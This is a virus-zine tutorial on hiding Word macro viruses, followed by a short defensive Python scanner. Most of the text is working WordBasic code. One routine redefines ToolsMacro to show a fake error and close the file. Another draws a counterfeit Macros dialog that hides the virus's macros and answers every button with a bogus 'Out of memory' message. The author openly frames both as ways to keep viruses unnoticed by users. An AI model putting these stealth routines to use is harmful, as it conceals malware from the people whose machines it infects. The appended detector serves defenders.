Serialkiller's Macro Virus Tutorial
- Simple Stealth -
I will show you two ways to hide macros in a virus. First I will explain
a simple routine to hide macros. However, the second one is a more effective
way to hide a macro.
1. All you have to do is make a macro with the name "ToolsMacro".
Normally it will already exist in WinWord. Erase all lines and
at the beginning type "SubMain" (all macros begin with this
command), and at the end type "EndSub" (all macros end with this
command).
Here is some example code which shows what your ToolsMacro macro could
look like:
SubMain
MsgBox "Illegal function in modul 0xCB15C001",32
FileExit
EndSub
-> SubMain
-> The beginning of the macro
-> MsgBox "Illegal function in modul 0xCB15C001",32
-> Display a messagebox with some fake error message.
-> Number 32 stands for the symbol which is displayed on the left
-> side of the message box, in this case it is a "!"
-> FileExit
-> Closes the currently opened file
-> EndSub
-> The end of this macro
Whenever the user clicks on "Tools" followed by "Macros" the new
ToolsMacro macro will activate, show him some error message and close
the currently opened file.
He will not get to see the macros (your virus).
Here is another, rather annoying ToolsMacro routine :)
Sub MAIN
Terror:
MsgBox "Hi", 32
Beep
Goto Terror
End Sub
About the symbols,
you can change the symbols if you type another number at the end of the
line in which you call MsgBox.
For example:
MsgBox"Hi",32
... where the last part (32) represents the symbol.
If you run the macro it will show you a message box with an "!" on it.
Here are the codes for the symbols:
16 stands for a cross red circle with "OK"
17 stands for a cross red circle with "OK" and "Cancel"
18 stands for a cross red circle with "Abort","Retry" and "Cancel"
19 stands for a cross red circle with "Yes","No" and "Cancel"
20 stands for a cross red circle
32 stands for a "!"
34 stands for a "?" with "Abort","Retry" and "Ignore"
37 stands for a "?" with "Retry" and "Cancel"
48 stands for a "!" with "OK"
49 stands for a "!" with "OK","Cancel"
50 stands for a "!" with "Abort","Retry" and "Ignore"
51 stands for a "!" with "Yes","No" and "Cancel"
52 stands for a "!" with "Yes","No"
53 stands for a "!" with "Retry","Cancel"
64 stands for a "I" with "OK" --> I = "Information"
66 stands for a "I" with "Abort","Retry" and "Cancel"
67 stands for a "I" with "Yes","No" and "Cancel"
68 stands for a "I" with "Yes","No"
69 stands for a "I" with "Retry" and a "Cancel"
2. Here is the 2nd way to hide a macro.
This routine is used in many viruses, such as MooNRaider. It's a far more
effective way to hide a macro. Most users will not notice that they
have a macro virus on their computer.
What this will do is generate a totally new Tools -> Macros dialog box,
but one without the macros. ;-)
Here is the code:
Sub MAIN
B$ = "Out of memory." ;it will show at all buttons, except "Cancel"
C$ = "WordBasic Err = 7" ;is the heading
Dim ComboBox1$(0) ;make the macro box
ComboBox1$(0) = "" ;will show NOTHING in the "macro Name" box
Dim ListBox1$(0) ;make the macro contents box
ListBox1$(0) = "" ;will show nothing in the macro contents box
Dim DropListBox2$(0) ;make the list box
DropListBox2$(0) = "Normal.dot(Global Template)" ;the list box will show
;Normal.dot (Global Template)
A:
Begin Dialog UserDialog 442, 320, "Macro" ;make the heading from the box "Macro"
CancelButton 290, 38, 141, 21 ;make the "Cancel" and the "Record" button
PushButton 290, 14, 141, 21, "Rec&ord...", .D2 ;make the "Record" button
PushButton 290, 72, 141, 21, "&Run", .D3 ;make the "Run" button
PushButton 290, 97, 141, 21, "&Create", .D4 ;make the "Create" button
PushButton 290, 125, 141, 21, "&Delete", .D5 ;make the "Delete" button
PushButton 290, 161, 141, 21, "Or&ganizer...", .D6 ;make the "Organizer" button
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 93, 13, "Macros &Available In:", .T1
Text 7, 259, 109, 13, "Description:", .T2 ;is the heading in the last box "Description"
Text 7, 7, 93, 13, "&Macro Name:", .T3 ;is the heading in the first box "Macro Name:"
ListBox 7, 276, 425, 38, ListBox1$(), .LB1 ;list it in the box
DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2 ;make the blank field under "Macros"
End Dialog ;end dialog
Redim dlg As UserDialog
x = Dialog(dlg)
Select Case x ;select button
Case 0 ;
Cancel ;
Case 1 ;
MsgBox B$, C$, 48 ;
Goto A ;will take the user back to the box "ToolsMacro"
Case 2 ;
MsgBox B$, C$, 48 ;
Goto A ; by ALL other buttons
Case 3 ; you will get the error
MsgBox B$, C$, 48 ; message "OUT of MEMORY"
Goto A ; and you will get on the
Case 4 ; "ToolsMacro" box again
MsgBox B$, C$, 48 ;
Goto A ;
Case 5 ;
MsgBox B$, C$, 48 ;
Goto A ;
End Select ;end select
End Sub ;end of the macro
I hope this helped you to make your viruses a bit harder to notice by the
average user :) If you have questions please feel free to write to me.
In our next mag I will show you how polymorphism works in Word macros :-)
--Serialkiller [Codebreakers]
xxserialkillerxx@hotmail.com
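
From the defender's side, both tricks leave static traces in the macros extracted from a document or template: a macro that redefines ToolsMacro, and a macro body that rebuilds the "Macro" dialog with the real dialog's button captions. The check below is an added example, not part of the original article; the function name, finding labels and sample macros are constructed for illustration, and it assumes macro names and source text have already been extracted by another tool.

```python
import re

# Built-in Word commands that a document or template macro should not redefine.
# Only ToolsMacro is named in the article; extend the set for your environment.
SHADOWED_COMMANDS = {"toolsmacro"}

# Button captions of the real Tools > Macro dialog that the article's fake copies.
REAL_CAPTIONS = ("Rec&ord...", "&Run", "&Create", "&Delete", "Or&ganizer...")

DIALOG_TITLE = re.compile(r'Begin\s+Dialog\s+UserDialog\b[^"\n]*"([^"]*)"', re.I)
FILE_EXIT = re.compile(r"^\s*FileExit\b", re.I | re.M)


def scan_macro(name, source):
    """Return a list of findings for one extracted macro (name + source text)."""
    findings = []
    # WordBasic macro names are not case-sensitive, so compare in lower case.
    if name.strip().lower() in SHADOWED_COMMANDS:
        findings.append("shadows-builtin-command")
        if FILE_EXIT.search(source):
            findings.append("exits-when-macro-list-opened")
    title = DIALOG_TITLE.search(source)
    copied = sum(1 for cap in REAL_CAPTIONS if cap.lower() in source.lower())
    # A custom dialog titled "Macro" that reuses the real captions is a look-alike.
    if title and title.group(1).strip().lower() == "macro" and copied >= 3:
        findings.append("imitates-macro-dialog")
    return findings


# Constructed samples (hypothetical, not taken from any real document).
STUB = 'Sub MAIN\nMsgBox "Illegal function", 32\nFileExit\nEnd Sub\n'
FAKE_DIALOG = (
    "Sub MAIN\n"
    'Begin Dialog UserDialog 442, 320, "Macro"\n'
    'PushButton 290, 72, 141, 21, "&Run", .D3\n'
    'PushButton 290, 97, 141, 21, "&Create", .D4\n'
    'PushButton 290, 125, 141, 21, "&Delete", .D5\n'
    "End Dialog\nEnd Sub\n"
)
BENIGN = 'Sub MAIN\nInsert "Signed by the accounts team"\nEnd Sub\n'

if __name__ == "__main__":
    for macro_name, text in (("ToolsMacro", STUB), ("toolsmacro", FAKE_DIALOG),
                             ("InsertSignature", BENIGN)):
        print(macro_name, scan_macro(macro_name, text) or "clean")
```

Any finding on a template such as Normal.dot is worth manual review, since the point of both routines is to keep the user from reaching the real macro list.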